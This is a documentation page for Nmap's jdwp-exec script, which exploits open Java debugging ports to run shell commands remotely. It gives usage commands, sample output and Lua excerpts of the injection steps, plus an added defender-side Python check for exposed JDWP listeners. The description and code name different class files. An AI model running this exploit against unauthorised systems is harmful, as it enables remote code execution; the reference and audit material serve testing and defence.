Nmap jdwp-exec NSE Script


This page contains detailed information about how to use the jdwp-exec NSE script. For a list of all NSE scripts, visit the Nmap NSE Library.


Script Overview


Script source code: https://github.com/nmap/nmap/tree/master/scripts/jdwp-exec.nse
Script categories: exploit, intrusive
Target service / protocol: tcp
Target network port(s): any
List of CVEs: -

Script Description


The jdwp-exec.nse script attempts to exploit Java's remote debugging port. When the remote debugging port is left open, it is possible to inject Java bytecode and achieve remote code execution. The script abuses this to inject and execute a Java class file that runs the supplied shell command and returns its output.

The script injects the JDWPSystemInfo class from nselib/jdwp-class/ and executes its run() method which accepts a shell command as its argument.
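A defender-side check for the exposure described above, as an added example that is not part of the Nmap project or the original page: it classifies JVM command lines by whether their JDWP agent listens beyond loopback. The process list is constructed sample data, and the function names and result labels are illustrative.

```python
import re

# Matches both the modern and the legacy spelling of the JDWP agent option.
JDWP_OPT = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")
LOOPBACK = {"localhost", "127.0.0.1", "::1", "[::1]"}

def parse_jdwp(cmdline):
    """Return the JDWP sub-options of a JVM command line as a dict, or None."""
    m = JDWP_OPT.search(cmdline)
    if not m:
        return None
    opts = {}
    for pair in m.group(1).split(","):
        key, _, value = pair.partition("=")
        opts[key] = value
    return opts

def classify(cmdline, java_major):
    """Classify one JVM as 'none', 'outbound', 'local' or 'exposed'."""
    opts = parse_jdwp(cmdline)
    if opts is None:
        return "none"
    if opts.get("server", "n") != "y":
        return "outbound"            # JVM dials out to a debugger, no listener
    if opts.get("transport") == "dt_shmem":
        return "local"               # shared-memory transport, not a TCP port
    address = opts.get("address", "")
    if not address:
        return "exposed"             # no address given: flagged conservatively
    host, sep, _port = address.rpartition(":")
    if not sep:
        # Bare port: JDK 9+ binds loopback only, older JDKs bind all interfaces.
        return "local" if java_major >= 9 else "exposed"
    return "local" if host in LOOPBACK else "exposed"

# Constructed sample: (pid, JDK major version, command line), as a host
# inventory job might collect them.
SAMPLE = [
    (1201, 8, "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 -jar app.jar"),
    (1202, 17, "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 -jar app.jar"),
    (1203, 17, "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar api.jar"),
    (1204, 11, "java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,address=127.0.0.1:5005 -jar web.jar"),
    (1205, 17, "java -Xmx2g -jar batch.jar"),
]

def audit(processes):
    """Map each pid to its JDWP exposure class."""
    return {pid: classify(cmd, major) for pid, major, cmd in processes}
```

JVMs reported as 'exposed' should have the agent removed or bound to loopback; a 'local' listener is still reachable by any user on the same host.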

Jdwp-exec NSE Script Arguments


This is a full list of arguments supported by the jdwp-exec.nse script:

jdwp-exec.cmd

Command to execute on the remote system.

To use this script argument, add it to the Nmap command line as in this example:

nmap --script=jdwp-exec --script-args jdwp-exec.cmd=value <target>

Jdwp-exec NSE Script Example Usage


Here's an example of how to use the jdwp-exec.nse script:

nmap -sT <target> -p <port> --script=+jdwp-exec --script-args cmd="date"

Jdwp-exec NSE Script Example Output


Here's a sample output from the jdwp-exec.nse script:

PORT     STATE SERVICE REASON
2010/tcp open  search  syn-ack
| jdwp-exec:
|   date output:
|   Sat Aug 11 15:27:21 Central European Daylight Time 2012
|_

Jdwp-exec NSE Script Example XML Output


There is no sample XML output for this module. However, if you provide the -oX <file> option, Nmap will produce XML output and save it in the specified file.

Author


  • Aleksandar Nikolic


The jdwp-exec.nse script may fail with the following error messages. The code snippets below, taken from the script source code, show where each message is raised and can often help in identifying the root cause of the problem.

error, %s


Here is a relevant code snippet related to the "error, %s" error message:

action = function(host, port)
  stdnse.sleep(5) -- let the remote socket recover from connect() scan
  local status,socket = jdwp.connect(host,port) -- initialize the connection
  if not status then
    stdnse.debug1("error, %s",socket)
    return nil
  end

  -- read .class file
  local file = io.open(nmap.fetchfile("nselib/data/jdwp-class/JDWPExecCmd.class"), "rb")

Failed to inject class


Here is a relevant code snippet related to the "Failed to inject class" error message:

  -- inject the class
  local injectedClass
  status,injectedClass = jdwp.injectClass(socket,class_bytes)
  if not status then
    stdnse.debug1("Failed to inject class")
    return stdnse.format_output(false, "Failed to inject class")
  end
  -- find injected class method
  local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)


Couldn't find run method.


Here is a relevant code snippet related to the "Couldn't find run method." error message:

  -- find injected class method
  local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)

  if runMethodID == nil then
    stdnse.debug1("Couldn't find run method")
    return stdnse.format_output(false, "Couldn't find run method.")
  end
  -- set run() method argument
  local cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd')
  if cmd == nil then
    return stdnse.format_output(false, "This script requires a cmd argument to be specified.")

This script requires a cmd argument to be specified.


Here is a relevant code snippet related to the "This script requires a cmd argument to be specified." error message:

    return stdnse.format_output(false, "Couldn't find run method.")
  end
  -- set run() method argument
  local cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd')
  if cmd == nil then
    return stdnse.format_output(false, "This script requires a cmd argument to be specified.")
  end
  local cmdID
  status,cmdID = jdwp.createString(socket,0,cmd)
  if not status then
    stdnse.debug1("Couldn't create string")

Version


This page has been created based on Nmap version 7.92.
